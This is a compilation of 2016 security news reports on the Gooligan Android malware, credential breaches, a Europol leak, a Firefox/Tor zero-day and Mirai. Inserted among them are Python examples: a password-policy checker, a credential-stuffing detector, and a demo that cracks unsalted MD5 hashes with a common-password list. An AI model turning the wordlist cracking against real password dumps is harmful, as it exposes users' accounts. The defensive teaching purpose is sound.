Password Manager Pro — Easiest Way to Keep Enterprises Secure
1.12.2016 thehackernews Safety
Recent corporate breaches have taught us something important — the average enterprise user is spectacularly bad at choosing good passwords.
As the modern enterprise becomes a hybrid organization, with infrastructure spread across on-premises data centers as well as the cloud, the security of information, applications, and assets has become a paramount concern.
Cyber security is no longer an optional strategy for businesses: limited visibility into employees' password practices and ineffective monitoring of privileged credentials can leave an organization facing a serious security breach and identity theft.
The first line of defense for any organization or company is passwords, but most organizations grossly underestimate the need to comply with corporate password policies and meet IT regulatory requirements.
Large enterprises have a policy in place that requires end users to choose strong passwords that can withstand dictionary and brute-force attacks, but it often proves ineffective, since users may still ignore the policy and pick a simple password.
Even if an organization's IT department forces their employees to choose strong passwords, those strong passwords are stored in text-based files like spreadsheets, or even worse, Word documents.
Not to mention the question of how secure these files are and how well they can restrict who has access to which passwords.
We know that Ignorance is Bliss, but in this case, ignorance can place your enterprise and its data at risk.
In addition to the issues of creating strong, unique passwords and storing them securely, large enterprises face another important problem: sharing non-personal administrative accounts among team members, which can be very challenging. For example, a particular 'administrator' account on Windows will be used by multiple users, all of them with the same login credentials.
The Solution? Password Manager for Enterprise:
A password manager not only forces users to have strong, unique passwords, but also remembers them on their behalf, determines when those passwords have to change, and includes an admin console for controlling all passwords and access to critical services within the enterprise.
I'm impressed with ManageEngine's privileged password management solution, Password Manager Pro, which already has VMware, Walmart, EMC2, and NASA on its customer list.
Password Manager Pro (PMP) is specially designed for enterprise teams and provides a complete solution to control, manage, monitor, and audit the entire lifecycle of privileged access, helping them detect suspicious events in real-time.
Password Manager Pro encrypts and stores all your sensitive data in a centralized vault, including passwords, documents, and digital identities, which are then retrieved through a Web interface.
Administrators can consolidate all the passwords, create an inventory, define password policy, set password expiration, and share passwords among authorized users by granting them exclusive privileges or temporary access.
Deploying Password Manager Pro is easy: the web-based management software, available for Windows and Linux, takes only a few minutes to install its database and web server.
Users can then access their portal through mobile apps or browser extensions from any device, including Android, iOS, and Windows.
In a single package, Password Manager Pro offers three solutions:
1. Privileged Account Management
Once deployed, Password Manager Pro automatically discovers all IT assets in your network and lists all the privileged accounts associated with them, which enables administrators to quickly secure all the privileged identities by enforcing password management best practices.
This includes the use of strong passwords, securing sensitive data and passwords with AES 256-bit strong encryption, and securely sharing administrative passwords across your organization based on need, with granular access restrictions.
Most importantly, the Password Manager Pro is also designed to automate the password reset and synchronization process across the entire enterprise for a broad range of target systems.
This centralized and enterprise-wide 'Automated Password Resets' feature helps IT administrators get rid of unchanged passwords and protect all sensitive resources from unauthorized access.
In other words, Password Manager Pro allows IT administrators to reset passwords on demand or randomize them automatically through scheduled tasks, ensuring strong passwords and periodic resets by creating and enforcing strict password policies.
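To make the policy side of this concrete, here is an added example (not ManageEngine's code, and not how Password Manager Pro implements it) of what "strong, unique passwords that withstand dictionary and brute-force attacks" plus a maximum password age look like as checks a vault could enforce. The policy values (16-character minimum, four character classes, a tiny constructed wordlist, 90-day rotation) are assumptions chosen for illustration.

```python
"""Added example: generate and validate privileged-account passwords against an
assumed policy, and decide when a scheduled rotation is due. Not vendor code."""
import re
import secrets
import string
from datetime import datetime

# Constructed mini wordlist; a real policy engine would load a full dictionary.
DICTIONARY_WORDS = {"password", "admin", "welcome", "summer", "company", "letmein"}

LOWER, UPPER, DIGITS = string.ascii_lowercase, string.ascii_uppercase, string.digits
SYMBOLS = "!@#$%^&*()-_=+[]{}:,.?"
ALPHABET = LOWER + UPPER + DIGITS + SYMBOLS
# Undo common letter substitutions so 'P@ssw0rd' is still recognised as 'password'.
LEET = str.maketrans("@0134$5", "aoleass")


def policy_violations(password, account_name="", min_length=16):
    """Return human-readable violations of the assumed policy; empty list means compliant."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    for label, charset in (("lowercase", LOWER), ("uppercase", UPPER),
                           ("digit", DIGITS), ("symbol", SYMBOLS)):
        if not any(ch in charset for ch in password):
            problems.append(f"missing {label} character")
    lowered = password.lower()
    if account_name and account_name.lower() in lowered:
        problems.append("contains the account name")
    normalised = lowered.translate(LEET)
    for word in sorted(DICTIONARY_WORDS):
        if word in normalised:
            problems.append(f"contains dictionary word '{word}'")
    if password.isdigit() or re.fullmatch(r"(.)\1*", password):
        problems.append("digits only or a single repeated character")
    return problems


def generate_password(length=20, account_name=""):
    """Draw characters from the CSPRNG and retry until the candidate passes the policy."""
    while True:
        candidate = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if not policy_violations(candidate, account_name):
            return candidate


def rotation_due(last_changed, now, max_age_days=90):
    """True when a stored password has exceeded the assumed maximum age."""
    return (now - last_changed).days >= max_age_days


if __name__ == "__main__":
    print(policy_violations("P@ssw0rd1!", account_name="admin"))
    fresh = generate_password(account_name="svc-backup")
    print(fresh, policy_violations(fresh, "svc-backup"))
    print(rotation_due(datetime(2016, 8, 1), datetime(2016, 12, 1)))
```

The leetspeak normalisation is what catches the classic "compliant but weak" choices; without it a four-class, length-rule checker happily accepts `P@ssw0rd1!`-style passwords that every cracking wordlist contains.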
2. Remote Access Management
One of the outstanding features of Password Manager Pro is its ability to help administrators launch a direct connection with all remote devices, including those in remote data centers, with just one click from the product's GUI.
With its secure gateways, Password Manager Pro helps you provide remote access to your IT resources to employees and third-party contractors without even disclosing the passwords in plain-text. In other words, PMP enables remote login to devices without sharing passwords at all!
From its web-interface, authorized users can directly launch RDP, SSH, Telnet, and SQL console sessions, wherein all connections will be tunneled through Password Manager Pro's server and require no direct connectivity between the user device and remote host.
This feature has obvious advantages, such as saving the time usually spent copying and pasting passwords from a document, and increasing accountability, since Password Manager Pro tracks the access and usage of passwords.
3. Privileged Session Management
The remote connections to devices launched from Password Manager Pro's GUI can be closely monitored through PMP's Privileged Session Manager. All actions done by the users during the privileged session are video recorded and stored for forensic audits. The video records can be played back anytime, to trace actions to users.
Password Manager Pro also includes a session shadowing feature that, alongside session recording, offers real-time monitoring of sensitive privileged sessions launched by other users.
If any suspicious activity is discovered, administrators can immediately terminate sessions in real time, giving admins complete control over privileged sessions.
One can also enable two-factor authentication (2FA) and mobile access for authorized users or groups.
How to Get Password Manager Pro?
Password Manager Pro supports several different user access roles, including super admin, admin, and regular password users. An online demo of Password Manager Pro is available here, in case you want to have a quick look at the application.
Besides this, ManageEngine Password Manager Pro is now available in an MSP edition as well, which is specially designed for Managed Service Providers who manage the IT and network infrastructure of their customers.
ManageEngine's Password Manager Pro MSP Edition allows businesses to manage administrative passwords of their clients separately from a single management console or offer Password Management Service to them.
So, if ManageEngine Password Manager Pro fits your organization, you can give it a try. Pricing depends on the edition, the number of administrators and the language.
The cost varies widely, from the annual subscription of $495 for Standard edition, Single-language, and 2-admin (the number of users is unlimited) to $19,995 for an Enterprise edition, Multi-language, 200-admin, perpetual license.
All editions of ManageEngine Password Manager Pro can be downloaded (Windows/Linux) directly from the ManageEngine official website.
To understand how Password Manager Pro helps mitigate security risks related to privileged access, you can simply download the eBook for free.

More than 1 Million Google accounts hacked by Gooligan Android Malware
1.12.2016 securityaffairs Android

Experts from the security firm Check Point discovered a new Android malware dubbed Gooligan that has already compromised more than a million Google accounts.
Another malware, dubbed Gooligan, is threatening Android users. The Android malware has already compromised more than 1 Million Google accounts.
The Gooligan Android malware roots vulnerable Android devices in an attempt to steal the email addresses and authentication tokens stored on them.

The stolen information is used by crooks to hijack victims’ Google accounts and access sensitive data from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite.

“The attack campaign, named Gooligan, breached the security of over one million Google accounts. The number continues to rise at an additional 13,000 breached devices each day.” reported Check Point.

“Our research exposes how the malware roots infected devices and steals authentication tokens that can be used to access data from Google Play, Gmail, Google Photos, Google Docs, G Suite, Google Drive, and more.”

Experts from the security firm Check Point have discovered dozens of legitimate-looking Android apps containing the Gooligan malware. These mobile apps were available for download on third-party stores, but the experts also highlighted that users could download the malware directly by tapping malicious links embedded in malicious messages.


Once the malware is installed, it starts sending device information and stolen data to the C&C server.

“Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153),” added the researcher.

“These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user. If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely.”

Experts from Check Point confirmed that older versions of the Android operating system are affected, including Android 4.x (Jelly Bean, KitKat) and 5.x (Lollipop), roughly 74% of Android devices currently in use.


The crooks could rapidly monetize their efforts because Gooligan generates revenue by fraudulently buying and installing apps from the official Google Play Store and rating them and writing reviews on behalf of the phone’s owner. The malicious code also installs adware on the victims’ mobile devices.

If you fear you may be one of Gooligan's victims, you can use an online tool published by Check Point, the Gooligan Checker, which lets users check whether their Android device has been infected. It is very simple: just open the ‘Gooligan Checker’ and enter your Google email address.
If your device is infected, you need to re-flash it with a clean installation of the Android OS.

Thousands of UK National Lottery player accounts compromised
1.12.2016 securityaffairs Crime

Roughly 26,500 accounts of the UK National Lottery players were accessed by cybercriminals, authorities are investigating the case.
According to the operator Camelot, roughly 26,500 accounts of the UK National Lottery players were accessed by cybercriminals.

The security breach was spotted on November 28th during routine online security monitoring.

“We do not hold full debit card or bank account details in National Lottery players’ online accounts and no money has been taken or deposited,” added the operator.

“However, we do believe that this attack may have resulted in some of the personal information that the affected players hold in their online account being accessed.”

The operator Camelot rules out a compromise of its own systems; its experts believe the login credentials were stolen elsewhere. Affected players have been alerted by the operator via email.

“We regret to inform you that your account has been subject to an unauthorized login.” reads the email. “However, please be assured that we don’t hold full bank account details.. and no money has been deposited or withdrawn from your account”.


In response to the security breach, the operator suspended the accounts that were accessed by the crooks and the passwords were reset.

“Other players reacted in anger on Twitter after being alerted of their accounts being compromised, with one user, Richard C writing: “My account has been potentially breached. Not good at all.”” reported ESET.

Richard C (@rnc66), 29 Nov 2016: “Well this is a worry @TNLUK”
The National Lottery (@TNLUK), 21:41, 29 Nov 2016: “@rnc66 Hi, if you would like to discuss this email please contact us using the details included within it. Thanks, Charles”
The UK Information Commissioner’s Office is investigating the incident.

“We are aware of this incident and we have launched an investigation,” confirmed an ICO spokesperson.

“The Data Protection Act requires organizations to do all they can to keep personal data secure – that includes protecting it from cyberattacks. Where we find this has not happened, we can take action.”
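Camelot's explanation (credentials stolen elsewhere and replayed against its login page) describes credential stuffing, and the detail that the intrusion surfaced in "routine online security monitoring" is the part a defender can reproduce. The following is an added example, not Camelot's or any vendor's code: it runs a simple stuffing detector over a constructed web-login log. One source address trying many distinct accounts inside a short window with a high failure ratio is the signature; the accounts that succeeded inside such a burst are the ones to suspend and reset, which is the response the article reports. The log format, field order and thresholds are all assumptions.

```python
"""Added example: flag credential-stuffing bursts in constructed login logs and
list the accounts successfully accessed during them. Not the operator's code."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log, one attempt per line: "ISO-timestamp source-ip account result"
SAMPLE_LOG = """\
2016-11-28T02:00:01 203.0.113.5 alice FAIL
2016-11-28T02:00:02 203.0.113.5 bob FAIL
2016-11-28T02:00:03 203.0.113.5 carol OK
2016-11-28T02:00:04 203.0.113.5 dave FAIL
2016-11-28T02:00:05 203.0.113.5 erin FAIL
2016-11-28T02:00:06 203.0.113.5 frank OK
2016-11-28T02:00:07 203.0.113.5 grace FAIL
2016-11-28T02:00:08 203.0.113.5 heidi FAIL
2016-11-28T09:15:00 198.51.100.7 ivan FAIL
2016-11-28T09:15:20 198.51.100.7 ivan FAIL
2016-11-28T09:15:45 198.51.100.7 ivan OK
2016-11-28T10:02:00 192.0.2.9 judy OK
"""


def parse_log(text):
    """Parse the constructed log into (timestamp, ip, account, success) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, account, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, account, result == "OK"))
    return events


def detect_stuffing(events, window=timedelta(minutes=5), min_accounts=5, min_fail_ratio=0.7):
    """Return {ip: sorted accounts successfully accessed} for every IP that shows a
    burst of >= min_accounts distinct accounts within `window` where at least
    min_fail_ratio of the attempts failed. A legitimate user mistyping their own
    password (one account, a few failures) never trips this."""
    by_ip = defaultdict(list)
    for ts, ip, account, ok in events:
        by_ip[ip].append((ts, account, ok))
    flagged = defaultdict(set)
    for ip, attempts in by_ip.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window: drop attempts older than `window` before attempts[end].
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            burst = attempts[start:end + 1]
            accounts = {acct for _, acct, _ in burst}
            failures = sum(1 for _, _, ok in burst if not ok)
            if len(accounts) >= min_accounts and failures / len(burst) >= min_fail_ratio:
                flagged[ip].update(acct for _, acct, ok in burst if ok)
    return {ip: sorted(accts) for ip, accts in flagged.items()}


if __name__ == "__main__":
    for ip, accounts in detect_stuffing(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: stuffing burst; accounts to suspend and reset: {accounts}")
```

The ratio threshold matters: a stuffing run against a list stolen from another site succeeds on only the fraction of users who reuse passwords, so most attempts fail, whereas a real user retrying one account produces few failures across a single account. Production monitoring would add per-account views (one account hit from many addresses) and feed flagged IPs to rate limiting rather than acting on a single window.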

More than a million Google accounts threatened by new Gooligan malware

1.12.2016 SecurityWorld Android
Check Point Software has uncovered a new variant of Android malware that has breached the security of more than a million Google accounts.

The new malware campaign, Gooligan, roots Android devices and steals email addresses and stored authentication tokens. With this information, attackers can gain access to sensitive user data from Gmail, Google Photos, Google Docs, Google Play and G Suite.

“This theft of information on more than a million Google accounts is unprecedented and marks the next stage of cyber attacks,” says Daniel Šafář, Country Manager for the Czech Republic and the CZR region at Check Point. “We are seeing a shift in hackers' strategy: they now target mobile devices and try to extract sensitive information from them.”

Key findings:

The campaign infects 13,000 devices every day and is the first to have rooted more than 1 million devices.
Hundreds of the email addresses are associated with enterprise accounts from around the world.
Gooligan targets devices running Android 4 (Jelly Bean, KitKat) and 5 (Lollipop), which account for almost 74% of Android devices currently in use.
Once the attackers gain control of a device, they generate revenue by fraudulently installing apps from Google Play and rating them on the victims' behalf.
Every day Gooligan installs at least 30,000 apps on compromised devices, more than 2 million apps since the campaign began.

The malware has also affected the accounts and devices of Czech users.

Check Point immediately informed Google's security team about the campaign.

“We worked together to understand the situation and the appropriate steps. As part of our ongoing effort to protect users from the Ghost Push family of malware, we have taken numerous measures to protect our users and improve the overall security of the Android ecosystem,” says Adrian Ludwig, director of Android security at Google. Among other things, Google contacted the affected users and revoked their tokens, removed apps associated with the Ghost Push malware family from Google Play, and added new layers of protection to its Verify Apps technology.

Check Point's mobile research team first encountered Gooligan's code in the malicious SnapPea app last year. In August 2016 a new variant of the malware appeared, and since then it has infected at least 13,000 devices a day. About 57% of those devices are in Asia and about 9% in Europe.

Information on hundreds of email addresses associated with companies around the world has leaked. A device becomes infected when the user downloads and installs a Gooligan-infected app on a vulnerable Android device or clicks a malicious link in a message used in a phishing attack.

Check Point offers a free online tool that lets Android users check whether the security of their account has been breached.

“If your account has been compromised, a clean installation of the operating system on your mobile device is necessary. This complex process is called ‘flashing’, and we recommend powering off the device and taking it to a certified technician or your mobile service provider, because the whole operation requires expert handling,” adds Šafář.

Over 1 Million Google Accounts Hacked by 'Gooligan' Android Malware
30.11.2016 thehacknews Android

If you own an Android smartphone, Beware! A new Android malware that has already breached more than 1 Million Google accounts is infecting around 13,000 devices every day.
Dubbed Gooligan, the malware roots vulnerable Android devices to steal email addresses and authentication tokens stored on them.
With this information in hand, the attackers are able to hijack your Google account and access your sensitive information from Google apps including Gmail, Google Photos, Google Docs, Google Play, Google Drive, and G Suite.
Researchers found traces of Gooligan code in dozens of legitimate-looking Android apps on third-party app stores; once such an app is downloaded and installed, the malware starts sending the device’s information and stolen data to its command-and-control (C&C) server.
"Gooligan then downloads a rootkit from the C&C server that takes advantage of multiple Android 4 and 5 exploits including the well-known VROOT (CVE-2013-6282) and Towelroot (CVE-2014-3153)," researchers said in a blog post.
"If rooting is successful, the attacker has full control of the device and can execute privileged commands remotely."
According to Check Point security researchers, who uncovered the malware, anyone running an older version of the Android operating system, including Android 4.x (Jelly Bean, KitKat) and 5.x (Lollipop), is most at risk; these versions represent nearly 74% of Android devices in use today.
"These exploits still plague many devices today because security patches that fix them may not be available for some versions of Android, or the patches were never installed by the user," researchers added.
Once it has compromised an Android device, Gooligan also generates revenue for the cybercriminals by fraudulently buying and installing apps from the Google Play Store and rating them and writing reviews on behalf of the phone's owner. The malware also installs adware to generate revenue.
How to check if your Google account has been compromised with this malware?
Check Point has published an online tool to check if your Android device has been infected with the Gooligan malware. Just open ‘Gooligan Checker’ and enter your Google email address to find out if you've been hacked.
If you find yourself infected, Adrian Ludwig, Google's director of Android security, recommends running a clean installation of the operating system on your Android device.
This process is called 'flashing', and it is quite complicated, so the company recommends powering off your device and approaching a certified technician or your mobile service provider to re-flash it.

Data on Europol terrorism investigations accidentally leaked online
30.11.2016 securityaffairs Cyber
According to a Dutch television program, data on several investigations into terrorist groups conducted by Europol were accidentally leaked.
According to the Dutch television program Zembla, data on several investigations into terrorist groups conducted by Europol were accidentally leaked online. According to the program, the dossier contained information about 54 different police investigations, including the names and telephone numbers of suspects.

“Information on numerous international investigations into terrorism groups compiled by Europol was accidentally left online, unguarded by any password, a Dutch television program reported on Wednesday.” reported the Reuters Agency. “Europol, which helps European Union national police organizations cooperate, could not immediately be reached for comment. The television program Zembla cited Europol’s adjunct director Wil van Gemert as acknowledging the incident.”

The television program cited Europol’s adjunct director Wil van Gemert as acknowledging the incident.


The leak was caused by a former employee who took dossiers home, violating Europol’s rules of conduct. The man copied the sensitive information onto a hard drive, but he was unaware that the storage device was connected to the Internet and accessible to anyone without any restriction.

Zembla did not reveal any information contained in the dossier.

“Van Gemert was quoted saying it did not appear that the dossier had been seen by anyone other than Zembla researchers, but he could not rule it out.” continues Reuters.

“This affects confidentiality and that is why we immediately set up an investigation to see how this could have happened,” declared van Gemert.

Van Gemert explained that some individuals included in the dossier may still be under “long-term” active investigation.

“The fact that they were ten years ago, part of an investigation, can still mean that they are part of an investigation,” he added.

Dutch Member of the European Parliament Sophie in ‘t Veld published the following post on Twitter:

“Huge data leak. Will call for @EU_Commission and @Europol director to come and inform @Europarl_EN.”

(Sophie in 't Veld, @SophieintVeld, 08:15, 30 Nov 2016.) The tweet linked to a Zembla article, “Terrorismedossiers op straat door groot veiligheidslek Europol” (Terrorism dossiers leaked through a major Europol security breach), summarised as: “The Zembla programme has obtained more than 700 pages of confidential Europol information. Europol calls it a ‘very serious incident’.”
Below is the full statement from Europol:

“Europol operates state-of-the-art databases and secure communication capabilities for processing and analysing operational and classified information. Europol adheres to the highest standards of data security, including continuous security briefings provided to staff members: State-of-the-art security is the basis for maintaining trust among all the parties that share information and intelligence with and through Europol.

“As for any law enforcement agency processing sensitive information, the design of a robust system cannot completely eliminate human error. Europol has a robust framework in place regarding security clearance measures and sanctions for breaches of security rules.

“A recent case included in a Dutch television programme concerned the breach of an ex-Europol staff member with Europol’s security regime. The concerned former staff member, who is an experienced police officer from a national authority, uploaded Europol data to a private storage device while still working at Europol, in clear contravention to Europol policy.

“A security investigation regarding this case is on-going, in coordination with the respective authorities at national level to which the staff member returned. Current information suggests that the security breach was not ill-intended.

“Although this case relates to Europol sensitive information dating from around 10 years ago, Europol immediately informed the concerned Member States. As of today, there is no indication that an investigation has been jeopardised, due to the compromise of this historical data. Europol will continue to assess the impact of the data in question, together with concerned Member States.

“Human error is the weakest link when it comes to the intersection of staff, data, and technology. Although this risk can never fully be ruled out, Europol’s systems and the security training offered to Europol staff are constantly reviewed. Europol is serious about maintaining the trust from EU Member States and partners.”

Terrorism is a principal threat to Western countries; for this reason, the EU member states announced the creation of a new European counter-terrorism centre early this year.

The centre aims to improve information sharing among the national law enforcement bodies involved in investigating terrorist activities. Its creation became urgent after the tragic events in Paris.

The new centre is located at Europol’s headquarters in The Hague and is tasked with monitoring online activity by extremist groups and investigating how these groups exploit the Internet for their operations.

Hackers stole hundreds of thousands of passwords from the second-largest adult website

30.11.2016 Novinky/Bezpečnost Hacking
Ladies and gentlemen who visit adult websites should be on alert. The second-largest site of that kind has been attacked by hackers, who managed to steal the login details of several hundred thousand users from its database.
Xhamster is, after Pornhub, the second most popular adult site on the internet. It even ranks among the hundred most-visited sites in the world, in 76th place.

That is exactly why the news of the user data leak is so worrying. Motherboard reported that the attackers obtained the login details of almost 400,000 users.

The leak reportedly happened during this year, although Xhamster's representatives have not yet officially confirmed it. According to Motherboard, however, the passwords on the server were poorly encrypted, so the hacker or hackers did not have much work to do to steal the sensitive data.

Better change your password
Xhamster users should therefore change their password as a precaution, and do so on any other internet services where they use the same login details as well. That practically eliminates the risk that hackers will use the leaked password to get into their other services too.

A secure password should be at least six characters long and should contain digits and ideally both upper- and lower-case letters. Under no circumstances should a password consist of the user's name, simple words (such as “heslo”, the Czech word for password) or a mere sequence of digits.

400 million stolen passwords
This is the latest in a series of large credential leaks in which hackers targeted adult websites.

Two weeks ago, for example, it emerged that a record 400 million passwords had been stolen from adult sites. According to LeakedSource, the credential leak concerns the servers ,, and

The attack itself reportedly took place last month, but the details were only disclosed the week before last.

The hackers obtained such a large bundle of passwords thanks to a flaw directly on the server . They exploited it to get onto the servers of the operators, who are also behind the other sites mentioned.
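The two points the article makes, "poorly encrypted" passwords and the advice to change a reused password everywhere, are one problem seen from two sides, and an added example (not code from xHamster, Motherboard or LeakedSource) makes the connection concrete. It stores a few constructed sample users with an unsalted fast hash beside a salted, iterated PBKDF2 form, shows how the weak form reveals shared passwords and falls to a short common-password list with no real work, and shows that the hardened form neither reveals reuse nor can be checked without paying the full iteration cost per guess. The sample users, the wordlist and the iteration count are assumptions.

```python
"""Added example: weak (unsalted, fast) password storage beside a hardened
PBKDF2 form, plus a defender's audit of the weak store. Not any site's code."""
import hashlib
import hmac
import os
from collections import defaultdict

# Constructed sample users; "heslo" is the Czech word for "password".
USERS = {"alice": "heslo", "bob": "heslo", "carol": "Tr0ub4dor&3"}
# Constructed common-password list of the kind a defender audits against.
COMMON_PASSWORDS = ["123456", "heslo", "password", "qwerty"]


def weak_store(password):
    """The weak form: unsalted, fast hash. Equal passwords give equal digests, and a
    guess can be checked at hundreds of millions per second on commodity hardware."""
    return hashlib.md5(password.encode()).hexdigest()


def hardened_store(password, salt=None, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256, stored as a self-describing string so the
    parameters can be raised later without breaking existing records."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def hardened_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    _, iterations, salt_hex, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate.hex(), digest_hex)


def shared_hash_groups(weak_db):
    """Accounts whose unsalted digests collide share a password; this is visible in a
    dump without guessing anything, which is exactly why reuse across sites is risky."""
    groups = defaultdict(list)
    for account, digest in weak_db.items():
        groups[digest].append(account)
    return sorted(sorted(g) for g in groups.values() if len(g) > 1)


def audit_weak_db(weak_db, wordlist):
    """Defender's audit: which accounts in the weak store fall to a common-password list.
    One digest per word is enough for the whole database, because there is no salt."""
    lookup = {weak_store(word): word for word in wordlist}
    return {acct: lookup[digest] for acct, digest in weak_db.items() if digest in lookup}


if __name__ == "__main__":
    weak_db = {user: weak_store(pw) for user, pw in USERS.items()}
    print("shared passwords:", shared_hash_groups(weak_db))
    print("fall to wordlist:", audit_weak_db(weak_db, COMMON_PASSWORDS))
    record = hardened_store("heslo")
    print("hardened record:", record)
    print("verify ok:", hardened_verify("heslo", record), "wrong:", hardened_verify("Heslo", record))
```

With the hardened form the same wordlist audit would need one PBKDF2 computation per word per account, because each record has its own salt; that per-guess cost, not the secrecy of the algorithm, is what turns "not much work" into work that does not scale across a 400,000-user dump.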

Dangerous virus has infected a million devices and infects thousands more every day

30.11.2016 Novinky/Bezpečnost Viry
Security experts from Check Point warned on Wednesday of a massive security breach affecting users of devices running the Android operating system. An uninvited guest called Gooligan is responsible for more than a million compromised devices, and through it cybercriminals infect thousands more every day.
Gooligan is spreading across the internet, without exaggeration, like an avalanche. It is a very dangerous virus because it lets cybercriminals root Android devices. In other words, they can control smartphones and tablets remotely exactly as if they were holding them in their hands.

On an infected device, this insidious virus then steals email addresses and stored authentication tokens. With this information, attackers can access sensitive user data from various Google services: Gmail, Google Photos, Google Docs, Google Play and G Suite.

Targeting mobile devices
In exactly this way the attackers managed to obtain confidential information on hundreds of thousands of accounts. “This theft of information on more than a million Google accounts is unprecedented and marks the next stage of cyber attacks,” said Daniel Šafář, Check Point's representative for the Czech Republic.

He also pointed out that the newly discovered virus campaign, in which Gooligan plays the lead role, clearly shows the trends among hackers. “We are seeing a shift in hackers' strategy: they now target mobile devices and try to extract sensitive information from them,” Šafář said.

According to him, cybercriminals are also very successful in spreading this uninvited guest. Every day the malware infects some 13,000 devices. It targets Android versions 4 and 5, which are currently the most widespread.

Cashing in on installed apps
“Once the attackers gain control of a device, they generate revenue by fraudulently installing apps from Google Play and rating them on the victims' behalf. Every day Gooligan installs at least 30,000 apps on compromised devices, more than 2 million apps since the campaign began,” Šafář stated.

Check Point's security experts have already alerted Google's security team to the new malware campaign. Google has already contacted the affected users and warned them that their account may have been compromised.

Google staff have also removed the apps associated with this infection from the official Google Play store, since users could have been infected through it as well.

Anonymous Hacktivist 'Barrett Brown' Released From Prison
30.11.2016 thehacknews Crime
Barrett Brown, a journalist who formerly served as an unofficial spokesman for the hacktivist collective Anonymous, finally walked free from prison on Tuesday morning after serving more than four years behind bars.
The Dallas-born investigative journalist was arrested at his home in 2012, in the middle of an online chat, after posting tweets and a YouTube video threatening revenge against an FBI agent.
Brown, 35, initially attracted law enforcement's attention in 2011 when he shared a hyperlink to an IRC (Internet Relay Chat) channel where Anonymous members were distributing information stolen in the hack of the security think tank Strategic Forecasting, or Stratfor.
The hack allegedly exposed 200 gigabytes of data, which included email addresses and credit card information from Stratfor clients, including the US Army, US Air Force, and Miami Police Department.
Originally facing a sentence of more than 100 years in prison, Brown was convicted in January 2015 under a plea agreement with prosecutors and received almost five years in jail and nearly $900,000 in restitution and fines.
The two and a half years he has spent in pretrial confinement after his arrest were credited toward his total prison sentence.
Brown eventually pleaded guilty to three federal counts of obstructing a search warrant, making Internet threats and being an accessory to unauthorized access of a protected computer.

According to the Department of Justice, sharing the hyperlink was a crime because "by transferring and posting the hyperlink, Brown caused the data to be made available to other persons online, without the knowledge and authorization of Stratfor and the card holders."
On Tuesday, Brown was released from the Three Rivers Federal Correctional Institution in San Antonio, Texas, where he continued his work as a writer over the past year.
WikiLeaks Publishes 60,000 Emails From Contractor HBGary
Reacting to his release five months before the scheduled date, former National Security Agency (NSA) subcontractor Edward Snowden tweeted:
"Jailed since 2012 for his investigations, #BarrettBrown has finally been released from prison. Best of luck in this very different world."
Meanwhile, the whistleblower site WikiLeaks also published more than 60,000 emails from US private intelligence firm HBGary to celebrate Brown's release.
Hacktivist collective Anonymous initially obtained the emails in February 2011, but WikiLeaks published them in the form of a searchable database on Tuesday. Among other things, the leaked emails discussed targeting journalists and governments.

The code of a Firefox Zero-Day Exploit used to unmask Tor Users is online
30.11.2016 securityaffairs

A zero-day exploit in the wild has been used by threat actors to de-anonymize Tor users by executing malicious code on Windows machines.
The news is disconcerting and confirms the existence of a zero-day exploit in the wild that is being used by threat actors to de-anonymize Tor users by executing malicious code on their machines. The exploit targets Tor users but also any other netizen using the Firefox browser.

The zero-day vulnerability was first mentioned on the official Tor website, where a blog post quoted a JavaScript exploit that is actively being used in the wild to unmask Tor Browser users.

“This is a Javascript exploit actively used against TorBrowser NOW. It consists of one HTML and one CSS file, both pasted below and also de-obscured. The exact functionality is unknown but it’s getting access to “VirtualAlloc” in “kernel32.dll” and goes from there. Please fix ASAP. I had to break the “thecode” line in two in order to post, remove ‘ + ‘ in the middle to restore it.” reads the post.

Roger Dingledine, the well-known Tor co-founder, confirmed the zero-day and announced that the Mozilla security team is already working on a fix.

The zero-day is a memory corruption vulnerability that can be exploited to execute malicious code on Windows machines.


The security researcher Raylee (@TheWack0lian) explained that the payload used in the recent wave of attacks is quite similar to the one used by law enforcement in 2013 to de-anonymize the users of a child pornography site hosted on Freedom Hosting.

“It’s basically almost EXACTLY the same as the payload used in 2013,” TheWack0lian told Ars. “It exploits some vuln that executes code very similar to that used in the 2013 Tor browser exploit. Most of the code is identical, just small parts have changed.”

According to security researcher Joshua Yabut, the zero-day exploit triggers a heap overflow vulnerability and requires JavaScript to be enabled on the target machine.

The zero-day exploit code works on various versions of the Firefox browser, from 41 to 50; the fact that it can target all of these versions suggests that its authors have refined the malicious code over time.

As usual, the public disclosure of the JavaScript code could allow other threat actors in the wild to use it to track Tor users.

Until Mozilla releases a patch, users should avoid relying on Tor to protect their anonymity.

As usual, it is strongly suggested to disable JavaScript.

Hacking – German politicians fear Russian interference in the next election
30.11.2016 securityaffairs Hacking
German politicians fear Russian interference in the next election after the cyber attack that hit at least 900,000 routers.
During the weekend, an improved version of the Mirai botnet caused serious connectivity problems for at least 900,000 Deutsche Telekom routers.

Just after the attack, some experts speculated that Russian hackers were behind the botnet that powered it.

The Government of Berlin fears possible interference of Russian nation-state hackers with the 2017 German election.

The attack demonstrated once again how vulnerable modern society is to cyber threats, which can in turn interfere with a political election. German politicians fear the Kremlin’s cyber capabilities. The alleged Russian interference in the US Presidential election is unleashing a domino effect and spreading fear among governments.

